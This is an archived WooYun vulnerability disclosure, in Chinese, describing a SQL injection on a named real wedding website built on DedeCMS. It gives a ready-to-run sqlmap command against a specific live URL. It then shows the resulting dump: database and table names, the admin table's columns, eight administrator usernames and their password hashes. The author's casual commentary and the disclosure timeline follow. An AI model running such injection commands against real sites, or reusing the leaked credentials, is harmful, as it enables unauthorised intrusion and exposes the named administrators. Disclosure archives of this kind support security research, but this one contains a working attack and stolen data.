乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-17: 厂商已经主动忽略漏洞,细节向公众公开
话说和客服妹子聊聊,人家还是很看重网安的~~
注射点命令sqlmap.py -u "http://www.vivibride.cn/m/arc.php?aid=7928" --dbs
脱出信息,直捣admin
available databases [2]:[*] information_schema[*] vivibrideDatabase: vivibride[88 tables]+-----------------------+| dede_addonarticle || dede_addonimages || dede_addoninfos || dede_addonshop || dede_addonsoft || dede_addonspec || dede_admin || dede_admintype || dede_advancedsearch || dede_arcatt || dede_arccache || dede_archives || dede_arcmulti || dede_arcrank || dede_arctiny || dede_arctype || dede_area || dede_channeltype || dede_co_htmls || dede_co_mediaurls || dede_co_note || dede_co_onepage || dede_co_urls || dede_diyforms || dede_dl_log || dede_downloads || dede_erradd || dede_feedback || dede_flink || dede_flinktype || dede_freelist || dede_guestbook || dede_homepageset || dede_keywords || dede_log || dede_member || dede_member_company || dede_member_feed || dede_member_flink || dede_member_friends || dede_member_group || dede_member_guestbook || dede_member_model || dede_member_msg || dede_member_operation || dede_member_person || dede_member_pms || dede_member_snsmsg || dede_member_space || dede_member_stow || dede_member_stowtype || dede_member_tj || dede_member_type || dede_member_vhistory || dede_moneycard_record || dede_moneycard_type || dede_mtypes || dede_multiserv_config || dede_myad || dede_myadtype || dede_mytag || dede_payment || dede_plus || dede_purview || dede_pwd_tmp || dede_ratings || dede_scores || dede_search_cache || dede_search_keywords || dede_sgpage || dede_shops_delivery || dede_shops_orders || dede_shops_products || dede_shops_userinfo || dede_softconfig || dede_sphinx || dede_stepselect || dede_sys_enum || dede_sys_module || dede_sys_set || dede_sys_task || dede_sysconfig || dede_tagindex || dede_taglist || dede_uploads || dede_verifies || dede_vote || dede_vote_member |+-----------------------+Database: vivibrideTable: dede_admin[10 columns]+-----------+------------------+| Column | Type |+-----------+------------------+| email | char(30) || id | int(10) unsigned || loginip | varchar(20) || logintime | int(10) unsigned || pwd | char(32) || tname | char(30) || typeid | text || uname | char(20) || userid | char(30) || usertype | float unsigned |+-----------+------------------+Database: vivibrideTable: dede_admin[8 entries]+--------+| uname |+--------+| admin || binxue || 曹燕 || 梦成 || 七七 || 天晓 || 薇新 || 伊果 |+--------+Database: vivibrideTable: dede_admin[8 entries]+----------------------+| pwd |+----------------------+| 068998b9095d9278d510 || 54f037a1329df6cf98dd || 8c428cb38d5f26085367 || 91e8f31ca8f3b665df9d || ad1a86cfd25fbff578ba || f403e6cfa8d94240ddf9 || fa5ee17c3c56008deb15 || fed72b9d8d708efcaca1 |+----------------------+
这是什么鸟密码。。。。吓得我赶紧捏捏我家猫的小尾巴,后台没找着,网速卡成狗。。我也是醉了,不过人家客服态度没得说,很在意网安,等乌云去联系呢
综上
维修队何在!
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)